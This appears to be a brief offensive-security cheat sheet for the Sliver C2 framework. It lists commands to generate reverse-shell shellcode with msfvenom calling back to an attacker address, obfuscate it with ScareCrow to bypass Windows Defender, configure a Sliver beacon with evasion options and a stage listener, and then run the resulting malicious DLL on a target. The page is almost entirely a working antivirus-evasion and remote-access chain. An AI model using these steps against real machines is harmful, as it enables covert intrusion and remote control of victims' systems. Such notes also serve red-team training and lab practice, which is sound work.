Sliver C2

Install all post-exploitation tools

armory install all

Bypass Windows Defender

  1. Generate a shellcode (with msfvenom).

msfvenom -p windows/x64/custom/reverse_winhttp LHOST=10.10.14.13 LPORT=9001 LURI=/hello.woff -f raw -o shellcode.bin
  1. Download ScareCrow (require Golang).

git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
go build .
  1. Obfusctate the shellcode with ScareCrow.

./ScareCrow -I shellcode.bin -Loader dll -nosign
  1. Setup Sliver C2.

profiles new beacon --arch amd64 --os windows --mtls 10.10.14.13:9000 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 qu35t
stage-listener --url http://10.10.14.13:9001 --profile qu35t --prepend-size
mtls --lhost 10.10.14.13 --lport 9000

Windows Defender Status

  1. Upload and execute your malicious dll on the target machine.

Last updated